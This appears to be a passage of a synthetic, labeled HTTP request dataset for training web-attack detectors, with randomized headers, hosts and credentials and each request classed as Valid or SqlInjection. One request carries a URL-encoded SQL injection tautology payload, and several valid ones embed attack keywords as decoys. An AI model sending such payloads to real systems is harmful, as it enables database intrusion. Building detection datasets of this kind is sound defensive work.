Authorization: NTLM ZWFvbFN0dFJNYzBqcmUyM2x0ZXR1cm50bzRDYTluZEZuZWVjeWY=
Range: 1-568088,6956-8,075-
Referer: /po3nke.png
TE: trailers,deflate,chunked
Trailer: Host
User-Agent: Mozilla/7.5 (Windows; U; WinNT 8.1; d8-es; rv:3.1.6) Gecko/07609204
UA-CPU: StrongARM
UA-Disp: 2661,0577,16
UA-Color: color16
Via: 8.3 100.197.150.40, 6.7 www.8hAe.tiff, HTTP/2.7 www.nauUrl.shtml
Transfer-Encoding: gzip
Upgrade: wnnr/5.6, rfetYt/6.7
Warning: 537 241.108.176.114:3 "suareips" 
X-Forwarded-For: 220.106.136.48
X-Serial-Number: 8290332205189510
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37320
Start - Id: 3671
class: Valid
GET /fJbnyy.x@/bxSVW_IB/TM/rd/IBs/oreimwag.bin?ndlsobydYixa7e=lw9neigtosdse&Qlslseebengesan=oodYD&u8okd=3&aayoigenia=300&Eetaaiip16e=zprocessing-instructionlhok&aa2giuwos=67962&6R-A27ZYpY=+iln HTTP/1.0
Host: www.guienSyuf.ch:1
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1254, euc-kr, iso-2022-kr;q=0.4, iso-8859-8;q=0.7
Accept-Encoding: *
Accept-Language: eIko-rijooya, IyVtwnba-ei;q=0.9
Cache-Control: no-transform
Client-ip: 45.245.87.100
Cookie: s2cre=Er0fhjlhgecvfeehM;Si1nVB=trrprocessing-instruction&6b
Date: Tue, 02 Sep 08 02:02:49 GMT
If-Unmodified-Since: Fri, 30 Jan 09 22:04:38 UTC
If-Range: Tue, 06 May 08 14:35:08 UTC
Max-Forwards: 736
Authorization: Basic YXVFbmVwZWE6dTlzYQ==
Referer: /rnilfir/diho8t/fxbrdo5.conf
User-Agent: Mozilla/8.0 (compatible; MSIE 8.9; Win 9x; ijoue)
UA-OS: Mac OS X
Via: 9.4 157.255.105.221, HTTP/6.5 104.136.247.108:38662
Transfer-Encoding: gzip
Upgrade: 3eeR/4.1, tsn4o/2.2, whxrt/4.1, ninit/5.8, rnilt/7.9

null

End - Id: 3671
Start - Id: 29748
class: Valid
GET /t9Q7A/xbnq8S0d2z/VWnPdeleterrcphttpsH@IP/49hSpOT/yMrnr/onM/okqYCwitOugy0Q/i2zBpEg/suCO3fk/m70U9GC6VconnectQ.aspx? HTTP/1.0
Host: www.eliea.it:1
Connection: close
Accept: text/*, application/*, video/quicktime;q=0.3
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.5
Accept-Language: 2mpaE-aeiu, nrht-tz, a-d5cecu;q=0.4, httds-mp;q=0.0, pdv-me
Cache-Control: min-fresh=131
Client-ip: 82.181.153.43
Cookie: ulwaie9Oey=48747;NryW=030047;eiat8=nlikena
Cookie2: $Version="71"
Date: Fri, 14 Sep 07 15:50:29 CET
ETag: W/"kXdlG-iSUUZv9yj66pu"
Expect: chxFad
From: aaaaonr@hEtmerN4em.biz
If-Modified-Since: Sun, 05 Apr 09 21:26:17 UTC
If-Unmodified-Since: Tue, 05 Jan 10 16:23:13 GMT
If-Match: "C8p9fkdoAvEdgYu8bp-W"
If-None-Match: "5eAPbkxkUsu_IolR"
If-Range: Sat, 10 Nov 07 22:39:40 UTC
Max-Forwards: 6
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: crSDqa Lrjm6ejj=na0tra
Authorization: Basic TjAyNHQ6cm53bGs=
Range: -63132
Referer: /daeah.php4
TE: trailers,deflate,trailers
Trailer: Warning
User-Agent: gucoe/3.9.5.6
UA-CPU: Sparc
UA-Disp: 3607,6288,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 2347x796
Via: 6.2 183.206.3.78
Transfer-Encoding: deflate
Upgrade: etort/8.1, nec/0.0, otezh/8.2, etwlre/8.4
Warning: 753 www.efttkwyh.shtml:579 "e6anePoa6iqyxLntoI" "Tue, 19 Jul 05 20:12:55 UTC"
X-Forwarded-For: 234.217.103.7
X-Serial-Number: 59542782600244
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29748
Start - Id: 25611
class: Valid
GET /oACDaHJiof/ZjoptDFZycROEkXVW/ognrvrepbS7airdsalg/d..jpeg?dfdenn=9 HTTP/1.1
Host: www.oeesi.fr
Connection: ehlha
Accept: */*;q=0.3
Accept-Charset: x-mac-arabic;q=0.7, iso-2022-jp, iso-2022-kr, x-mac-japanese, iso-8859-1;q=0.7
Accept-Encoding: gzip, compress;q=0.5, gzip
Accept-Language: *
Cache-Control: no-store
Client-ip: 70.74.10.34
Cookie: U2UFbKE6XU=t E
Cookie2: $Version="0"
Date: Thu, 25 Sep 08 21:12:35 CET
ETag: "Yo--9d6ylj0sIJCXID"
Expect: o51lPsi=ojng4
From: ofler@wmho0ac.it
If-Modified-Since: Sat, 13 Jan 07 05:58:35 CET
If-Unmodified-Since: Tue, 24 Jul 07 16:07:33 GMT
If-Match: "lmnFfJnF3JJUCEEPMm"
If-None-Match: "T-Tm3qwqW.6XfElCXyv"
If-Range: Sun, 04 Apr 04 11:50:44 UTC
Max-Forwards: 58
MIME-Version: 6.8
Pragma: lQymttco=cyternr6
Proxy-Authorization: NTLM dG95ZXM0ZW1TbDVPZXRpckV0eW1haUF3Y3hjc3N4Y2V0dGVjb2k=
Authorization: Digest username="rtpsd0r"
Range: -1684
Referer: http://cenoogc.net/tzoRghia/anewe/syvjqsa.css
TE: gzip;q=0.0
Trailer: Cache-Control
User-Agent: roegsehdor (aEsLrl; hts3jVt56t; uD.u4t1)
UA-CPU: 68000
UA-Disp: 8439,526,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 1157x6904
Via: HTTP/0.6 148.130.183.130, 0.0 137.217.0.49:638, 5.4 207.18.139.85
Transfer-Encoding: deflate
Upgrade: rNjc/2.0, qdsuma/2.4, aee/6.0, ooi/8.6
Warning: 650 136.91.203.255 "ymolni9b19rts" 
X-Forwarded-For: 255.93.182.143
X-Serial-Number: 400505966006
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25611
Start - Id: 26445
class: Valid
GET /kitow87Egnwiwd8v/9D_ZDHpassthrulib/sfl16N8oluEJYWUnl/qIU9RySfxY5zwS.gif?aronoh5Okas=18401561&0p0lnEeac=niuutHrgdz&gyi=oaa7h8dduha&oiat=a-&eyshAaetb=varNexecnhr7oi3fromi&xglymrzeI=55&X1KfAPRhPG=fd%2F%28&tt6xne80=9az&7iusiz=4028&ydihga2tessp=48432 HTTP/1.1
Host: 25.22.110.78
Connection: close
Accept: */*
Accept-Charset: x-mac-roman, iso-8859-15;q=0.8, windows-1252;q=0.5, big5;q=0.6
Accept-Encoding: *;q=0.9
Accept-Language: vt-da, P-00te9t9e;q=0.8, Te-nrh3r;q=0.5, u2mhaoet-Ca
Cache-Control: no-store
Client-ip: 228.137.159.244
Cookie: bxN3eEdynrA=x;dkre9eNjr4eny= 7t;irese56=4;e3=lnode
Cookie2: $Version="77"
Date: Tue, 16 Oct 07 19:55:57 UTC
ETag: W/"k9Dk3NJbk72BU_HLo_V"
Expect: 100-continue
From: rhj7it@hRooetd.be
If-Modified-Since: Sun, 25 Dec 05 05:17:52 UTC
If-Unmodified-Since: Thu, 15 Jul 04 19:46:23 CET
If-Match: *
If-None-Match: "3qU6NLzmBMrEjsTChc"
If-Range: Fri, 02 Sep 05 07:29:19 UTC
Max-Forwards: 80
MIME-Version: 9.0
Pragma: ce4Dztze='twdom'
Proxy-Authorization: Digest username="tmff8btS"
Authorization: otec ai8nnEro=enxorer4
Range: 31-37154,2-
Referer: http://lt0he.st/twtnhe/enwouad.bin
TE: chunked
Trailer: Connection
User-Agent: Ep8at5siev (ekJNr6S; cDrGj2; oe5dFrZ7y)
UA-CPU: StrongARM
UA-Disp: 719,2731,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 598x8802
Via: HTTP/3.8 www.ehtmriD.jpeg:4
Transfer-Encoding: identity
Upgrade: nwe3t/7.8, m7d8/4.9, uea7/6.3, raeyjr/3.1
Warning: 816 www.aegrtfH.jpg "tmrtheosaoahwt" 
X-Forwarded-For: 34.156.94.22
X-Serial-Number: 101021310
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26445
Start - Id: 7027
class: Valid
PUT /servicesK60evalJSSEVLreplacelF/o5PM8njt6/n2oizaz/PpositionXYOJhe/UQmBnullXek5Ne7/ouissohe5iTs/usdncsye6nfx.exe? HTTP/1.0
Content-Length: 215
Content-Language: jAi,ee
Content-Encoding: deflate
Content-Location: http://7ehw4o.cz/hahz/lhdnrg/enlbr.png
Content-MD5: QnRyb21wYWFFZWFlbnlNZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 28 Mar 06 17:58:23 CET
Last-Modified: Thu, 02 Aug 07 09:39:13 GMT
Host: 21.120.239.128
Connection: keep-alive
Accept: application/*;q=0.6, video/quicktime;q=0.5
Accept-Charset: *
Accept-Encoding: *
Accept-Language: eu-keu8enle;q=0.1
Cache-Control: no-store
Client-ip: 245.122.180.4
Cookie: eie6i=nooCmlelna
Cookie2: $Version="0"
Date: Thu, 26 Nov 09 02:44:56 UTC
ETag: "esxO4Dm9sC_j@UD5"
Expect: 100-continue
From: tssMn@1oPt.gov
If-Modified-Since: Wed, 01 Jul 09 19:11:58 GMT
If-Unmodified-Since: Wed, 11 Oct 06 02:55:52 UTC
If-Match: "o@VcZGok6eZsqLE4O"
If-None-Match: *
If-Range: Mon, 29 May 06 06:40:32 UTC
Max-Forwards: 9565
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: cls18 ensvsjo=ofs8etd
Authorization: Digest qop=auth-int
Range: -251792
Referer: /nsmh36bd/m2As/ciesg.mspx
TE: deflate,gzip
Trailer: Range
User-Agent: Mozilla/4.1 (Machintosh; U; PPC 7.1; Ne-nj; rv:3.7.4) Gecko/78959959
UA-CPU: Sparc
UA-Disp: 1173,628,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 9521x736
Via: 8.7 64.18.96.158
Transfer-Encoding: identity
Upgrade: lka/1.1, sansgb/6.9, tbztw/9.8
Warning: 310 117.137.73.10 "hth8tnutSeoe1rhmv" 
X-Forwarded-For: 213.145.136.133
X-Serial-Number: 8626260685
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

yeey=9357956&gn5IwtS=d5QuUvDcpw&eahkadll=hY&ogrhienc=7609661&niccdlmiea=71216708&zHAoea0=eaoehqfef&esellnfoz5Sfm=sj rex>nnoce&OgzcbtyaRS=?cnmLtefspassthruwindow.openlmy&nofe=nfeudtsrnfrid&GEohfnnohhtke3=51715249

End - Id: 7027
Start - Id: 8802
class: Valid
GET /w3ebjd/ot5etojihoa8a/ooiaAoEk/sjr0ofwitam4/Y0_s2HcopyGYuymE/tefoetfXqampeui.msf?gtaan0l=155597&oA7motPntc8ese=1189&IRpasswdcopy2winnty0=5773&JT1F2=rtehSp4ihscceo&cmir=0U%40JicJ&octI2eed5hRnr3p=++u&EoChRroeim=mvBrRe2zr3u&etce8hotsmoa3qe=i1%40B4J3ZPm&sixtril=Gief%7E&scriptU0nHWjWw_system=zb9AtTo4XLdN HTTP/1.0
Host: www.ctNn.net:80
Connection: uvvT
Accept: image/png, text/html
Accept-Charset: koi8-r, cp-936, x-mac-cyrillic, us-ascii;q=0.4, hz-gb-2312
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: no-store
Client-ip: 13.13.235.187
Cookie: ad0vEcesttateo=ire;rMlt3=lcpmZr;mscdw3=Tiuecs9yqe;aA6tl=naraw;@Pk4u=cESs;dib=WsNit
Cookie2: $Version="370"
Date: Wed, 04 May 05 08:10:10 CET
ETag: "tWB0BtGgKIOW9@5ro"
Expect: 100-continue
From: feered@asls8twn0.it
If-Modified-Since: Mon, 03 Jan 05 13:28:47 UTC
If-Unmodified-Since: Wed, 14 Jan 04 02:33:08 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 17 Apr 04 15:42:08 CET
Max-Forwards: 774
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: Digest cnonce="locenctt"
Authorization: Digest nc=5ECEECf6
Range: -807244
Referer: http://aji1ruar.org/Gehe2ntt/oiys1r/aehHOw/Ombi.js
TE: trailers
Trailer: Date
User-Agent: wivale3grnq2bnba
UA-CPU: 68000
UA-Disp: 347,7346,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 7482x1972
Via: FTP/8.5 www.a3oRamt.css
Transfer-Encoding: gzip
Upgrade: ohe/2.6, oaa/8.5
Warning: 442 www.Bhp9s.jpeg "ent7orsmhitOM" 
X-Forwarded-For: 71.221.125.93
X-Serial-Number: 28573562
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 8802
Start - Id: 23956
class: Valid
GET /reoIEYeuTaMfmbr/tFqOFNmz00Z-d-mBF0g/87aot0hi/i3ou/aPXiOq_KbXAw@@SLrsSZ/_2m8N.gif?3ymaili9=noinua&1emastscucs0nti=Yle75ehWwzi48u7&eat69sljfaoieon=o%404UJp&nrscze4=loeEnIregn7sSled&oeyn8=teus%3Bn1w0rwinntnwe-e HTTP/1.1
Host: www.ommqeSca.ch:436
Connection: close
Accept: application/postscript
Accept-Charset: windows-1250;q=0.5, iso-8859-2;q=0.0, euc-kr, utf-8;q=0.5
Accept-Encoding: 
Accept-Language: iectn-n4ualeo, ulbrur-em;q=0.3, iuwaw-6gaedAa;q=0.1
Cache-Control: a='h1tydeeT'
Client-ip: 242.13.161.207
Cookie: wSyet3acqogrM=r4w5yjyzQ-xq;tttctabLNraw=734252;rsotag=antroqso;riaiacker=4535;an9=-
Cookie2: $Version="843"
Date: Sun, 05 Dec 04 03:10:29 GMT
ETag: W/"FvkHj8C9bQkH4Xda@"
Expect: teh2c=f8EkwEre;8i8hk9
From: hhia@RXgEevnUs.cz
If-Modified-Since: Mon, 13 Feb 06 06:47:54 CET
If-Unmodified-Since: Wed, 17 Oct 07 13:26:31 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 17 Oct 09 19:58:55 UTC
Max-Forwards: 3919
MIME-Version: 9.0
Pragma: s=doxX
Proxy-Authorization: Digest username="hihrci"
Authorization: Digest response="2bD32cdffd5FfF32c6a87FbDeBb86470"
Range: 074-7647,9-,-3
Referer: http://www.9Wa9aor.uk/tdmr09hi/frhiS/rreid.aspx
TE: deflate,trailers,chunked
Trailer: Referer
User-Agent: at4epZsisa (ePHZT4l-; 8yl@lamVn; s9luw8G; cIUlYzlRSf; ma7Lcr12)
UA-CPU: StrongARM
UA-Disp: 862,451,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 916x209
Via: 3.2 120.118.25.127
Transfer-Encoding: deflate
Upgrade: aehr/3.4, ioW/9.5
Warning: 716 www.snsnMln.gif "7ithne" 
X-Forwarded-For: 16.106.202.140
X-Serial-Number: 149109156633944
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23956
Start - Id: 4708
class: Valid
PUT /qAear/mMYK8.htm? HTTP/1.1
Content-Length: 28
Content-Language: nntvy
Content-Encoding: identity
Content-Location: http://www.1nomoyc.net/N3iui/vas9d9tf/seapjs/nashteh/aiiolt.zip
Content-MD5: NnBzaG1scmlEZHQ0ZW9lYw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 17 Jul 04 10:26:45 CET
Last-Modified: Sun, 28 Feb 10 04:22:15 GMT
Host: 239.198.142.81
Connection: abcgt8
Accept: */*;q=0.2
Accept-Charset: x-mac-arabic, iso-8859-8, iso-8859-5, x-mac-roman;q=0.3
Accept-Encoding: gzip;q=0.1, gzip;q=0.3
Accept-Language: eohl3ibR-rxd;q=0.9, mu-ssGlsun;q=0.8
Cache-Control: no-cache
Client-ip: 206.185.144.175
Cookie: erTvlHUEr4fct=arxOd;yYjOvqQoh7DQ=642;ndOkoqzene=er;s7f7scriptQFj=66218;aNa8T5stGwnnSr=8snatdlcdpetti;a5dldejor=31477994
Cookie2: $Version="718"
Date: Mon, 18 Apr 05 12:07:26 UTC
ETag: W/"snKD8.gVEgu6COXJftG"
Expect: 100-continue
From: duigdno@04ugaeaAe.biz
If-Modified-Since: Tue, 06 Apr 10 03:29:09 UTC
If-Unmodified-Since: Tue, 24 May 05 16:35:17 UTC
If-Match: *
If-None-Match: "1NKRY4B03E5BY6iNd"
If-Range: Mon, 18 Jun 07 14:23:31 UTC
Max-Forwards: 07
MIME-Version: 4.2
Pragma: 5=rd
Proxy-Authorization: Basic MW90c09zZjpscnJpMg==
Authorization: Digest nonce
Range: -242,-19368,124822-039647
Referer: http://www.pcndtea.com/oroe.php4
TE: trailers
Trailer: If-None-Match
User-Agent: Mozilla/6.4 (Windows; U; WinNT 0.2; sZ-pa; rv:1.6.0) Gecko/98891556
UA-CPU: Sparc
UA-Disp: 759,838,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 868x5971
Via: HTTP/5.6 244.222.214.248, FTP/2.2 www.8risa.js
Transfer-Encoding: deflate
Upgrade: e6Tb/5.8
Warning: 098 235.30.125.178 "esttjUveeeheane5ia" "Thu, 27 Dec 07 01:39:19 UTC"
X-Forwarded-For: 112.130.112.55
X-Serial-Number: 669900608328585
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

sPHtkesena=t&ehEanh8vfauv=dj

End - Id: 4708
Start - Id: 32009
class: Valid
GET /a4J-z61AS5_rT-JelO/56mwSan/n7hzi/wsmxreae9nsia/si0tiirS0dlrglmh3o/ksefsetk/s@F8yN6D.bin? HTTP/1.1
Host: 116.144.7.179
Connection: pndlrNa
Accept: image/gif
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: min-fresh=8609
Client-ip: 204.40.173.64
Cookie: as7trNacnslk=io;cha8s58aiS=7064
Cookie2: $Version="84"
Date: Tue, 18 Sep 07 08:01:43 CET
ETag: "XKZQs-d0UPQvNCH"
Expect: seorom=taoy1E3h;rns82eg6
From: rjitei@aeyn5.net
If-Modified-Since: Fri, 22 Sep 06 15:45:35 UTC
If-Unmodified-Since: Fri, 16 Jul 04 04:30:27 GMT
If-Match: *
If-None-Match: "A.u0jxFfCk72a5aUll"
If-Range: "nWP8gL4zND.eeQEHRXPD"
Max-Forwards: 48
MIME-Version: 4.0
Pragma: u9hhnr='e'
Proxy-Authorization: seHi alur=ihcd
Authorization: 2ehl amhs=fihlhnao
Range: 42992-
Referer: http://nehvtr.biz/aRZH9l/odar93/sojlhV3s.js
TE: chunked;q=0.2,trailers,trailers
Trailer: Warning
User-Agent: Mozilla/6.4 (Windows; U; Win 9x 0.9; at-rH; rv:1.5.8) Gecko/07562990
UA-CPU: PowerPC
UA-Disp: 612,8755,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 879x932
Via: 1.5 115.71.252.184:1829, FTP/5.1 200.211.38.208
Transfer-Encoding: compress
Upgrade: idoj/6.1, g7eoil/4.7, cotot/9.8, ewrnb/5.4, 2axs/6.7
Warning: 078 www.xupee.css "ddnuabvh4s6stdds" 
X-Forwarded-For: 34.245.202.84
X-Serial-Number: 2079694360100759
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32009
Start - Id: 12890
class: Valid
GET /stDo3aHz6Nb/watmrh/etoDurraekneeclug7aR/bgsoundtgy8Bvprocessing-instructionA9GysZconnect/feq7srOueostoawet/Nufupsnlwtss/gEu4jU.beyUq/f-script4S6KP0d0BH.asp?idaL1uf60ny=3667589&Ms=t&frs=urv_Ul&easzgrv=0788453397&echonMk_Q.3=01808&a6ole=ttJsopro&mlpeehocazl=ifTbgsound&oozsdlieosmih=sct0routroott9ynq&ewftrdau2jnTeny=liyoheST&tn=1cxRni17crtoiiettE&st=7315923 HTTP/1.1
Host: 122.65.176.119
Connection: e021not
Accept: text/xml;q=0.3, image/jpeg
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 138.179.154.230
Cookie: tt1TeeauedhnM=323
Cookie2: $Version="53"
Date: Fri, 17 Dec 04 06:32:05 CET
ETag: "L59RFNPtyIMPynvt4SDP"
Expect: 100-continue
From: ngeagi8r@t1t7.com
If-Modified-Since: Thu, 22 May 08 15:37:30 UTC
If-Unmodified-Since: Mon, 20 Mar 06 12:59:01 CET
If-Match: "WDRtgYhLt@Zy55T"
If-None-Match: *
If-Range: *
Max-Forwards: 6
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: Basic ZWhlOHBhYmk6b29tM29l
Authorization: a6pi WMth=szlrs
Range: -98948,71-14281,08201-3
Referer: http://RipdnSo.uk/e5sexNo.pdf
TE: deflate
Trailer: Pragma
User-Agent: Mozilla/2.5 (Windows; U; WinNT 0.8; ea-te; rv:5.3.3) Gecko/38860079
UA-CPU: StrongARM
UA-Disp: 769,338,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 8835x5264
Via: 8.8 151.181.75.159:58067
Transfer-Encoding: gzip
Upgrade: ioeah/7.8, nuq/3.5, nnm/0.8
Warning: 657 108.119.89.134 "n3Eimiaj3lnutimDg" 
X-Forwarded-For: 216.6.120.104
X-Serial-Number: 4907746729509688
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12890
Start - Id: 8866
class: Valid
GET /tih3goHEh/mj4yI9KpI6/eVIKMbS0GK/dhhm2iseuwau/ntnevmsiwchn/ttmspr1tpea/fVe.shtml?atteih1iloW=ytulqowsttgyrn9&41xSIF-AY8U=6&9IWEbew=eNoutdEecd4erulkd&eew1Kmr=984977&dlrto8ighpsw2=c5Tp HTTP/1.0
Host: 51.117.61.236:529
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: t-e, 0ylsqlEo-tcuf2, lyqfoly-nhch;q=0.2
Cache-Control: only-if-cached
Client-ip: 73.159.234.63
Cookie: iahYdhD=Eh;tdw34cto=dt?5twf;rtinr=w ee>vhhphpbodyWce;abo=1GE1arY
Cookie2: $Version="41"
Date: Sat, 25 Apr 09 14:35:04 UTC
ETag: W/"K-VLQNG8XZBqpH0wo"
Expect: 100-continue
From: iu0es@geoakos.de
If-Modified-Since: Wed, 15 Apr 09 20:53:05 GMT
If-Unmodified-Since: Fri, 30 Mar 07 13:01:10 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 29 Jul 08 05:02:20 UTC
Max-Forwards: 11
MIME-Version: 8.5
Pragma: qhr4eo=cr
Proxy-Authorization: Basic cmVoZHJzOmV5cjdpYUJt
Authorization: NTLM ZXJ0bTJyOW1uaTAwY0xvb2RlNGNtaHBvc21lc3pyb2FpcnNzRThBb2Q=
Range: 965-
Referer: /alSia/tqttskna/eEe94.txt
TE: trailers,chunked,trailers
Trailer: If-Modified-Since
User-Agent: iSnreo
UA-CPU: Sparc
UA-Disp: 909,1237,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 345x783
Via: HTTP/0.0 www.2hUsi.png
Transfer-Encoding: deflate
Upgrade: 64r/8.7, oderoo/0.3, agsp/5.1, cWlgn/3.7, Gpz/5.9
Warning: 783 35.10.18.150:3 "9nnorlnAnhrie" "Sat, 04 Feb 06 11:45:36 CET"
X-Forwarded-For: 234.237.173.153
X-Serial-Number: 56388963279118
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8866
Start - Id: 5105
class: Valid
PUT /15cRa/vr1leu0k0hmi/a_C5xJTx4Rz/nv/tFnechrD4tm7t9fc/_I/vHnesfkezalLitalEgi/r1C19D1N./ui/wXULSXruvh.gif? HTTP/1.0
Content-Length: 221
Content-Language: lrJ,4nutp
Content-Encoding: identity
Content-Location: /65egia/rhdwm/gkj2r/0goe6.cfm
Content-MD5: YWVkaHlhUmVpbmVBYW40RQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 12 Feb 08 23:59:40 CET
Last-Modified: Wed, 11 Feb 04 10:00:40 CET
Host: www.fpuam1ot.cz
Connection: close
Accept: */*;q=0.5
Accept-Charset: *;q=0.1
Accept-Encoding: gzip
Accept-Language: aczy-s74;q=0.2, chfneeno-atcOm;q=0.5, lrd-tR;q=0.2, enjo39ma-Nn
Cache-Control: no-store
Client-ip: 214.176.234.46
Cookie: tusgsel=n he(
Cookie2: $Version="853"
Date: Thu, 06 Apr 06 24:07:28 CET
ETag: ".gbrYssKFPv@V7NeRZ02"
Expect: 100-continue
From: kIews1@lmencl.cz
If-Modified-Since: Sun, 30 Oct 05 03:51:02 UTC
If-Unmodified-Since: Tue, 19 May 09 23:51:03 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3824
MIME-Version: 8.8
Pragma: d=tte
Proxy-Authorization: Basic MG5vdDpib29lcmhv
Authorization: eelsso mote=iOtaeh
Range: 492-
Referer: /EOua8da/Unon/O8iyoe/H35a/eeC9mt.jpg
TE: trailers,trailers,deflate
Trailer: Host
User-Agent: Mozilla/5.3 (Windows; U; Win98 0.4; mn-og; rv:5.3.4) Gecko/56041781
UA-CPU: Sparc
UA-Disp: 4888,9411,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 436x920
Via: crt/4.0 74.247.47.233, ePTty/1.9 92.187.144.46, FTP/7.3 82.147.220.145
Transfer-Encoding: deflate
Upgrade: er0ehc/2.7, phh/7.5, 1dao/0.3, easp/6.7, Gdae/4.3
Warning: 045 www.glqe.js "r3y4amdOaIhbislattz" "Sun, 09 Apr 06 01:43:43 CET"
X-Forwarded-For: 248.188.122.40
X-Serial-Number: 7409190136131843029
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

6avAKEnR=tPpg&MDoeeeaae=[fqe&eo0myy=oce1moebk&j0y=s&t7q3ficf=bdqitwhyR&tbnyuioojxu=Ahselect4e&ewarmutilatg6m=ne5ea&oen=pwHtqao9w1QE&uit8en0h1usng=33817555&djAcsy=613&pM0shutdownJE5MVF=sdr8aaanEytfrlzn&rj2atsNlcGmcyoD=1h

End - Id: 5105
Start - Id: 42482
class: SqlInjection
GET /8Fl6A7Q0jTnc/sdeeeragesft/nspnszedetotiejba/nTleTiidnpa/ort.js?Ese=ironaeiao&dhtncnohh=satr&lti1=445276855&dlyIaysse2=2933089&H6feFvmetabXII4=133001311&uaeiehab=obinhi+-ta&alige=%27++++OR++++%27triepaOdsas%27+++%3C+%27X&0uscfae=bds&3u4nto=+utl1o+aoad0S&hhithrv=haA_ELJP-N5c&ietsEwheR=b%3Cgz&aau4hjcawhtn=+%3Fegi5group+byn%5B+nbn8%5D&oow=%7E HTTP/1.1
Host: 96.196.50.122
Connection: close
Accept: video/*;q=0.2
Accept-Charset: euc-jp, iso-10646-ucs-2, windows-1251, ks_c_5601-1987;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 89.45.12.136
Cookie: oyfnaih=e;rajeehcsi5e=battptxp_o bwsti ;Gocl5cSevrye2oa=oeujl;DOinput_OUvorvpfq=nothgtThLEnegto6Cl;tnsunet91qht=82
Cookie2: $Version="2"
Date: Fri, 27 Aug 04 20:45:56 GMT
ETag: "ucyTNdNZwmzBEzMRFjR"
Expect: 100-continue
From: sheo@RafNi.uk
If-Modified-Since: Mon, 11 Feb 08 05:13:38 UTC
If-Unmodified-Since: Tue, 06 Sep 05 14:11:54 CET
If-Match: "1VcAmnYoS6YUuknzBeY"
If-None-Match: *
If-Range: *
Max-Forwards: 720
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: tnrr qtclsQSi=e3eg
Authorization: emmed 32haU8=slot
Range: 7-59040
Referer: /c10srntk/7pial/Vsbisy/dedi7Weh/bhvteowe.msf
TE: deflate;q=0.5,trailers
Trailer: Transfer-Encoding
User-Agent: tncRRy2 http://www.bea6so.fr
UA-CPU: x86
UA-Disp: 1488,9515,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 733x829
Via: HTTP/2.6 www.onoc.tiff, FTP/2.5 11.114.114.134, 4.7 www.rtta.png
Transfer-Encoding: gzip
Upgrade: i9t/0.4, rer/6.1, the/8.5, Dxmt/8.7
Warning: 899 www.i1dtW1t.js:1401 "nerre4v" "Thu, 17 Mar 05 06:33:46 CET"
X-Forwarded-For: 83.163.212.155
X-Serial-Number: 242296099385997
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42482
Start - Id: 34229
class: Valid
POST /eeeataoinsmaom/otst/xPrmZ@-sKJpxterm/c40oam/t6.jpg? HTTP/1.0
Content-Length: 319
Content-Language: terle,Z18uge
Content-Encoding: gzip
Content-Location: http://www.voni.be/4oehreaI/e3hkaa/Minwsts.dll
Content-MD5: bmVic2VzYTdvZTRiZVdUZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 15 Dec 05 22:58:49 GMT
Last-Modified: Fri, 16 Feb 07 11:09:01 CET
Host: 42.91.121.200
Connection: close
Accept: image/*, image/*, audio/basic
Accept-Charset: us-ascii, x-mac-chinesetrad;q=0.4
Accept-Encoding: compress;q=0.5, compress;q=0.8, deflate;q=0.0, identity, gzip
Accept-Language: ivthSw-nrt0sji
Cache-Control: max-age=4472
Client-ip: 89.82.249.53
